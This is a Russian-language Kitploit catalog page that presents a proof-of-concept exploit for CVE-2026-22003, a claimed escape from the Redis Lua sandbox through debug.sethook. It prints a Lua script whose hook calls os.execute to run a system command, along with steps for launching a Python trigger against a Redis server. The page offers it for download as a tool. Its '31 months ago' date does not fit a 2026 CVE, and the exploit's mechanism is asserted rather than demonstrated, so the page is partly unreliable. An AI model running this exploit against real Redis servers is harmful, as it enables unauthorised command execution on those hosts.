Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook- — PoC-эксплойт для CVE-2026-22003, демонстрирующий побег из песочницы Redis Lua через debug.sethook для выполнения произвольных системных команд. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-
Повышение привилегийАнализ уязвимостейЭксплуатацияБезопасность Баз ДанныхСостязательная Атака
GitHubgeorge0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-

CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook-

PoC-эксплойт для CVE-2026-22003, демонстрирующий побег из песочницы Redis Lua через debug.sethook для выполнения произвольных системных команд.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
31 месяц назадЕщё не проверено

CVE-2026-22003 – Обход песочницы Redis Lua через debug.sethook

Код программы (триггер на Lua + Python)

root@kitploit:~
-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
  debug.sethook(function() 
    -- This hook runs in a privileged context
    os.execute("id > /tmp/redis_escape") 
  end, "r")
  local a = 1
end
return escape()

CVE-2026-22003 – Обход песочницы Redis Lua через debug.sethook

Severity: Critical

Обзор

Песочница Lua в Redis некорректно отключает функцию debug.sethook. Злоумышленник, который может выполнять Lua-скрипты, способен установить хук, выполняющийся в привилегированном контексте, и выйти из песочницы для выполнения произвольных системных команд.

Детали уязвимости

  • Тип: Обход песочницы
  • Воздействие: Удалённое выполнение кода на хосте Redis.
  • Корневая причина: Библиотека отладки в окружении Lua остаётся доступной, что позволяет хукам вызывать os.execute или подобные функции.

Демонстрация эксплуатации

  1. Запустите сервер Redis (с конфигурацией по умолчанию, которая разрешает EVAL).
  2. Запустите эксплойт:
    root@kitploit:~
    pip install redis
    python trigger_redis_sandbox_escape.py
    

Создаётся файл /tmp/redis_escape, что доказывает выполнение команд.

Скачать инструмент